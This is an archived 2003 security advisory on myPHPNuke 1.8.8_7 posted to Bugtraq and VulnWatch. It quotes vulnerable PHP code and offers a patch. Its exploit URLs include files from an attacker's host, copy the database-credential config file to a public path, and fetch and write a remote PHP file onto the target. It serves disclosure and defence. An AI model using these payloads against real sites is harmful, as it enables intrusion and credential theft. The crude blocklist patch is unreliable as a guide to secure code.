[VulnWatch] myPHPNuke : Copy/Upload/Include Files

From: Frog Man (leseulfrog_at_hotmail.com)
Date: 09/11/03

  • Next message: _at_stake Advisories: "[VulnWatch] Asterisk CallerID CDR SQL Injection" 
    To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
Date: Thu, 11 Sep 2003 12:14:09 +0200

    Informations :
    °°°°°°°°°°°°°
    Language : PHP
    Version : 1.8.8_7
    Website : http://www.myphpnuke.com
    Problems : - Upload/Copy/Include Files

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°

    gallery/displayCategory.php :

    ------------------------------------------
    [...]
    <?php

    include ("$basepath/imageFunctions.php");
    include ("$adminpath/fileFunctions.php");
    ------------------------------------------

    mailattach.php :

    -----------------------------------------------------
    [...]
    <?
    OpenTable();
      global $attachmentdir;

      $attchfile = $attachmentdir.$attach1_name;

       if(isset($submit) ) {
           if ($attach1_name != "") {
               copy("$attach1", $attchfile)
                or die("Couldn't copy the file!");
                echo "<script> attach();</script>";
           } else {
               die("No input file specified");
           }
           echo "<script> attach(); </script>";
       } else {

    ?>
    [...]
    -----------------------------------------------------

    Exploits :
    °°°°°°°°
    - http://[target]/gallery/displayCategory.php?basepath=http://[attacker]
    will include the file :
    http://[attacker]/imageFunctions.php

    - http://[target]/gallery/displayCategory.php?adminpath=http://[attacker]
    will include the file :
    http://[attacker]/fileFunctions.php

    -
    http://[target]/mailattach.php?submit=1&attach1=admin/original/config.php&attach1_name=../DBInfos.txt
    will copy the file admin/original/config.php (with DB Informations) into
    http://[target]/DBInfos.txt .

    -
    http://[target]/mailattach.php?submit=1&attach1=http://[attacker]/bad.txt&attach1_name=../bad.php
    will copy the file bad.txt into http://[target]/bad.php

    - etc...

    Solution :
    °°°°°°°°°
    A patch can be found on http://www.phpsecure.info.
    In gallery/displayCategory.php, add before all lines the lines :
    -------------------------------------------------------------------
    if (isset($_REQUEST["basepath"]) OR isset($_REQUEST["adminpath"])){
    die("Patched.");
    }
    -------------------------------------------------------------------

    And in mailattach.php, add just after the lines :
    -------------------------
    [...]
    <?
    OpenTable();
       global $attachmentdir;
    [...]
    -------------------------

    the lines :

    -----------------------------------------------------------------------------------------------------------------------------------------------------------
       if (isset($_REQUEST["attach1_type"]) OR isset($_REQUEST["attach1_name"])
    OR ereg("/",$attach1) OR ereg("\.\.",$attach1) OR ereg(".php",$attach1_name)
    ){
       die("Patched.");
       }
    -----------------------------------------------------------------------------------------------------------------------------------------------------------

    More Details :
    °°°°°°°°°°°°
    In french :
    http://www.phpsecure.info/v2/tutos/myPHPNuke.txt

    frog-m@n (http://www.phpsecure.info)

    _________________________________________________________________

  • Next message: _at_stake Advisories: "[VulnWatch] Asterisk CallerID CDR SQL Injection"

    Relevant Pages

    • Re: Web Animation and Sound Advice Sought
      ... upon someone landing on my website, ... My blog program is a php program that makes use of a mysql database. ... linux (and the linux server supports all sorts of php). ... $500+ Premiere software -- at least on my first brief experimenting ...
      (misc.writing)
    • Re: Furthering my education in OOP - where/how can one learn professional skills?
      ... but I am not proud of the rather amateurish ... implement them in a website. ... is PHP the best language to use to learn and implement the full ... power of OOP? ...
      (comp.lang.php)
    • Re: Python and Flaming Thunder
      ... eventually the PHP fad will die out. ... customer happiness the New York Times uses hand-coded HTML. ... data descriptor language, PHP is a process descriptor ... well-known website claimed that they handcode is a big news to ...
      (comp.lang.python)
    • Re: [PHP] Evaluating a page in a different order
      ... I have a php page class that i use as a template for my website. ... The class includes the layout from ...
      (php.general)
    • Re: Got Delphi for PHP - first impressions
      ... Having exactly Delphi and PHP as my two main developer platforms, ... Delphi for PHP sounded at first as a something sent from heaven. ... It looks more like normal Windows apps. ... full fledged websites, having the look and feel as a website. ...
      (borland.public.delphi.non-technical)